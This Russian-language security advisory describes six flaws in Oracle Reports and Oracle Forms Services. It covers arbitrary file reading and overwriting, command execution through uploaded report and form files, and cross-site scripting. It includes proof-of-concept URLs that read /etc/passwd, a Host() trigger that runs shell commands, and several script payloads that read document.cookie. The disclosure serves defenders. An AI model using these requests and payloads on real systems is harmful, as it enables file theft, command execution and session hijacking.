Обнаруженные уязвимости позволяют удаленному пользователю прочитать и перезаписать файлы, выполнить произвольные команды на целевой системе и произвести XSS нападение.

1. Уязвимость при обработке параметра DESFORMAT в Oracle Reports позволяет удаленному пользователю просмотреть произвольные файлы на системе, используя абсолютный путь к файлу. Пример:

http://myserver:7778/reports/rwservlet?server=
myserver+report=test.rdf+userid=scott/tiger@
iasdb+destype=file+MODE=CHARACTER+desformat=/etc/passwd

2. Уязвимость в Oracle Reports при обработке исполняемых файлов отчетов (*.rep, *.rdf) позволяет злоумышленнику, с правами загрузки файлов на сервер приложений, выполнить произвольные команды на системе, прочитать и перезаписать произвольные файлы с привилегиями процесса. Злоумышленник может указать абсолютный путь к файлу и выполнить отчет в любой директории на сервере.

Сценарий атаки:

1. Злоумышленник создает или модифицирует обычный отчет путем добавления вызова ORA_FFI для запуска команд или вызова TEXT_IO для создания и чтения файлов сервере прилжений.
2. Злоумышленник генерирует исполняемый файл отчета (например hacker.rdf или hacker.rep) для целевой системы.
3. Копирует исполняемый файл отчета на сервер приложений с помощью подручных средств (SMB, FTP Webdav, NFS…).
4. Выполняет отчет следующим образом:
http://myserver.com:7779/reports/rwservlet? server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF

3. Уязвимость существует при обработке параметра DESNAME в Oracle Reports. Удаленный пользователь может с помощью специально сформированного URL перезаписать произвольный файл на системе с привилегиями процесса.

4. Уязвимость при выполнении форм в Oracle Forms Services позволяет злоумышленнику выполнить произвольные команды на системе.

Сценарий атаки:

1. Злоумышленник создает обычную форму и добавляет к ней следующие строки:


"WHEN_NEW_FORM_INSTANCE"-Trigger
Host('ls > forms_is_unsecure.txt' , NO_SCREEN);
2. Злоумышленник генерирует исполняемый код формы (например, hacker.fmx) для целевой платформе.
3. Копирует бинарник формы на сервер приложений.
4. Запускает отчет следующим образом:
http://myserver.com:7779/forms90/f90...doe/hacker.fmx
или
http://myserver.com:7779/forms90/f90...tmp/hacker.fmx

5. Уязвимость в Oracle Reports при обработке параметра customize позволяет злоумышленнику просмотреть произвольный файл на целевой системе, указав абсолютный путь к нему. Пример:

http://myserver:7778/reports/rwservlet?server=
myserver+report=test.rdf+userid=scott/tiger@
iasdb+destype=cache+desformat=xml+CUSTOMIZE=
/opt/ORACLE/ias/oracle/product/9.0.2/webcache/webcache.xml

6. Межсайтовый скриптинг возможен в Oracle Reports 9.0.2 при обработке входных данных в параметре customize. Злоумышленник может выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:


http://myserver:7778/reports/rwservlet/showenv?
server=reptest&debug=<script>alert(document.cookie );</script>
http://myserver:7778/reports/rwservlet/parsequery?
server=myserver&test=<script>alert(document.cookie );</script>

http://myserver:7778/reports/rwservlet?server=
myserver+report=test.rdf+userid=scott/tiger@
iasdb+destype=localFile+desformat=delimited
+desname=FILE:+CELLWRAPPER=*+
delimiter=<script>alert(document.cookie);</script>

http://myserver:7778/reports/rwservlet?server=
myserver+report=test.rdf+userid=scott/tiger@
iasdb+destype=localFile+desformat=delimited
+desname=FILE:+CELLWRAPPER=<script>
alert(document.cookie);</script>

URL производителя: oracle.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Источник: http://www.red-database-security.com